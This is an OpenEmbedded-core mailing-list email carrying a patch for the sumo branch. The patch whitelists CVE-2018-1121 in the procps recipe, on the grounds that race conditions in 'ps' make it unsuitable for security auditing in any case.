From patchwork Wed Nov 6 15:37:55 2019 Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit X-Patchwork-Submitter: Mikko Rapeli X-Patchwork-Id: 178735 Delivered-To: patch@linaro.org Received: by 2002:a92:38d5:0:0:0:0:0 with SMTP id g82csp863680ilf; Wed, 6 Nov 2019 08:46:15 -0800 (PST) X-Google-Smtp-Source: APXvYqwCpLnELV16PXYFwnAwzg6YyJ3N2BMrXBehxWfqgXp+DVG/yF4tU+P/+ooMYnF9gGFEDPA+ X-Received: by 2002:a63:3144:: with SMTP id x65mr3597276pgx.283.1573058774879; Wed, 06 Nov 2019 08:46:14 -0800 (PST) ARC-Seal: i=1; a=rsa-sha256; t=1573058774; cv=none; d=google.com; s=arc-20160816; b=vkNzllPkC43oTuakaXBooGPauYs0YV3cBnI7ASFdQIvbvDCMdUGDGNzeNeqyBvKdfn VSo13cICKeKYqK3cVOAzx0go419uj2RNzQ0GwzZ4gupAW8GYqVqWMyFxXRx8sfKrzATJ ivWvLD1/UJuXxwakojuQId7E6zqVVLkH4hShZ2nBm+lnZJ2HnL9yMnv1aJ9zi/dG1zcZ CnvjJDE50X+JANS3BM9c1Z4/8KeqClAAgn9vXjZAHjL9TIz4E5GHOLWFDIPhLPJ6P92j pCnLP2MnjtRGTCQUeR3N4jVHYsNHyQWSmtmQTvRgugETHM9Krm1Rb0NxA1C9g0toh3eb jZaA== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=errors-to:sender:content-transfer-encoding:mime-version :list-subscribe:list-help:list-post:list-archive:list-unsubscribe :list-id:precedence:subject:references:in-reply-to:references :in-reply-to:message-id:date:to:from:dkim-signature:delivered-to; bh=jGBPdiSqxD8XL5MSrc+4/lnslWZ5Oylofgn1hkW6k5E=; b=pKbvzIsp2k993wpMAZ1rqYU7clrBDtu7lbnfSg4h7WwKa53JxBuvecShk6iDS9VEXS pCPO9UJdt2Tarh3/ycXj6VKDn/ee2591e2ZrDVp7N5PcnAWb1+ogcKDPjrikG2q21Sfe ATK9JIf+BtKEeLs3DTsjOdJ6jGi/38nTmzliLZ85a/Tgcdnqv0qWKH715mGN/yJ2R9f8 Hstbpn5CwT9vsNXBJ8dyH9ckVKKgkH0D9fDCKivLjbHwkOEUP3AcY/qOTHNl0VW62qye ViTnyx13MtdocJL6/ZCzcNRvzoBx4Zzfah8GtYmvnc+soOryCdDkX5lCmQFW1emfV3XF 9V8w== ARC-Authentication-Results: i=1; mx.google.com; dkim=neutral (body hash did not verify) header.i=@kapsi.fi header.s=20161220 header.b=gCsc3B2r; spf=pass (google.com: best guess record for domain of openembedded-core-bounces@lists.openembedded.org designates 140.211.169.62 as permitted sender) smtp.mailfrom=openembedded-core-bounces@lists.openembedded.org; dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=bmw.de Return-Path: Received: from mail.openembedded.org (mail.openembedded.org. [140.211.169.62]) by mx.google.com with ESMTP id s16si6543653plp.416.2019.11.06.08.46.14; Wed, 06 Nov 2019 08:46:14 -0800 (PST) Received-SPF: pass (google.com: best guess record for domain of openembedded-core-bounces@lists.openembedded.org designates 140.211.169.62 as permitted sender) client-ip=140.211.169.62; Authentication-Results: mx.google.com; dkim=neutral (body hash did not verify) header.i=@kapsi.fi header.s=20161220 header.b=gCsc3B2r; spf=pass (google.com: best guess record for domain of openembedded-core-bounces@lists.openembedded.org designates 140.211.169.62 as permitted sender) smtp.mailfrom=openembedded-core-bounces@lists.openembedded.org; dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=bmw.de Received: from ec2-34-214-78-129.us-west-2.compute.amazonaws.com (localhost [127.0.0.1]) by mail.openembedded.org (Postfix) with ESMTP id ACAD47FA9E; Wed, 6 Nov 2019 16:45:54 +0000 (UTC) X-Original-To: openembedded-core@lists.openembedded.org Delivered-To: openembedded-core@lists.openembedded.org Received: from mail.kapsi.fi (mail.kapsi.fi [91.232.154.25]) by mail.openembedded.org (Postfix) with ESMTP id 4C2E87F895 for ; Wed, 6 Nov 2019 15:38:45 +0000 (UTC) DKIM-Signature: v=1; a=rsa-sha256; q=dns/txt; c=relaxed/relaxed; d=kapsi.fi; s=20161220; h=References:In-Reply-To:Message-Id:Date:Subject:Cc:To:From: Sender:Reply-To:MIME-Version:Content-Type:Content-Transfer-Encoding: Content-ID:Content-Description:Resent-Date:Resent-From:Resent-Sender: Resent-To:Resent-Cc:Resent-Message-ID:List-Id:List-Help:List-Unsubscribe: List-Subscribe:List-Post:List-Owner:List-Archive; bh=atJbTtcY9rLbnvHA8TtUUDN35ClQHHb0dV3U+2Zy6Lk=; b=gCsc3B2rfb9/EfK4UHQpM12AD+ ijtODOS7Z8ws35/p0iCYU11QDPfSniAM/qVUzk8poNZ7JFaG+cIxJNbJSCljdfeshn02C4Amk/zq7 bYKlFnK8JaFCx1cofXiZnGx6/jfMNf37Xx++GkUqKTrRPMLMVIruoFSMs4lueJjxhMi9kMiylrKxn 67NucLYl7Z7h6es9791ZsiJvQWanxis79NFbSSERlOxppldTY9hVxBJ4+BqbOrERdoQbyQ6HRn0SH pVN/GxWv5kVQa8o16+0alSg2uKczJmaTAw7q6caFkLR0MtCN+hJ5YBYO5GE0hZSTFdRuHdpHnNYsM Qm3LF2Rg==; Received: from kapsi.fi ([91.232.154.11] helo=lakka.kapsi.fi) by mail.kapsi.fi with esmtps (TLS1.2:ECDHE_RSA_AES_128_GCM_SHA256:128) (Exim 4.89) (envelope-from ) id 1iSNOP-0000AA-V1; Wed, 06 Nov 2019 17:38:46 +0200 Received: from mcfrisk by lakka.kapsi.fi with local (Exim 4.84_2) (envelope-from ) id 1iSNO7-0007Zq-3H; Wed, 06 Nov 2019 17:38:27 +0200 From: Mikko Rapeli To: openembedded-core@lists.openembedded.org Date: Wed, 6 Nov 2019 17:37:55 +0200 Message-Id: <340de0c1062a72149b6b3b399215bafa61a52562.1573047195.git.mikko.rapeli@bmw.de> X-Mailer: git-send-email 2.1.4 In-Reply-To: References: In-Reply-To: References: X-Rspam-Score: 6.0 (++++++) X-Rspam-Report: Action: add header Symbol: ARC_NA(0.00) Symbol: DMARC_POLICY_SOFTFAIL(0.10) Symbol: R_SPF_NEUTRAL(0.00) Symbol: FROM_HAS_DN(0.00) Symbol: TO_DN_SOME(0.00) Symbol: MULTIPLE_UNIQUE_HEADERS(4.89) Symbol: MIME_GOOD(-0.10) Symbol: TO_MATCH_ENVRCPT_ALL(0.00) Symbol: RCPT_COUNT_THREE(0.00) Symbol: NEURAL_SPAM(0.00) Symbol: RCVD_TLS_LAST(0.00) Symbol: MID_CONTAINS_FROM(1.00) Symbol: IP_SCORE(-0.15) Symbol: FORGED_SENDER(0.30) Symbol: R_DKIM_NA(0.00) Symbol: MIME_TRACE(0.00) Symbol: ASN(0.00) Symbol: FROM_NEQ_ENVFROM(0.00) Symbol: RCVD_COUNT_TWO(0.00) Message: (SPF): spf neutral Message-ID: 340de0c1062a72149b6b3b399215bafa61a52562.1573047195.git.mikko.rapeli@bmw.de X-Rspam-Status: Yes X-Rspam-Bar: ++++++ X-SA-Exim-Connect-IP: 91.232.154.11 X-SA-Exim-Mail-From: mcfrisk@kapsi.fi X-SA-Exim-Scanned: No (on mail.kapsi.fi); SAEximRunCond expanded to false Subject: [OE-core] [PATCH RFC CFH][sumo 40/47] procps: whitelist CVE-2018-1121 X-BeenThere: openembedded-core@lists.openembedded.org X-Mailman-Version: 2.1.12 Precedence: list List-Id: Patches and discussions about the oe-core layer List-Unsubscribe: , List-Archive: List-Post: List-Help: List-Subscribe: , MIME-Version: 1.0 Sender: openembedded-core-bounces@lists.openembedded.org Errors-To: openembedded-core-bounces@lists.openembedded.org From: Ross Burton This CVE is about race conditions in 'ps' which make it unsuitable for security audits. As these race conditions are unavoidable ps shouldn't be used for security auditing, so this isn't a valid CVE. (From OE-Core rev: b3fa0654abf9ac32f683ac174e453ea5e64b6cb8) Signed-off-by: Ross Burton Signed-off-by: Richard Purdie Conflicts: meta/recipes-extended/procps/procps_3.3.15.bb --- meta/recipes-extended/procps/procps_3.3.12.bb | 3 +++ 1 file changed, 3 insertions(+) -- 1.9.1 -- _______________________________________________ Openembedded-core mailing list Openembedded-core@lists.openembedded.org http://lists.openembedded.org/mailman/listinfo/openembedded-core diff --git a/meta/recipes-extended/procps/procps_3.3.12.bb b/meta/recipes-extended/procps/procps_3.3.12.bb index 6e15b0a..d4ebaf9 100644 --- a/meta/recipes-extended/procps/procps_3.3.12.bb +++ b/meta/recipes-extended/procps/procps_3.3.12.bb @@ -64,3 +64,6 @@ python __anonymous() { d.setVarFlag('ALTERNATIVE_LINK_NAME', prog, '%s/%s' % (d.getVar('base_sbindir'), prog)) } +# 'ps' isn't suitable for use as a security tool so whitelist this CVE. +# https://bugzilla.redhat.com/show_bug.cgi?id=1575473#c3 +CVE_CHECK_WHITELIST += "CVE-2018-1121"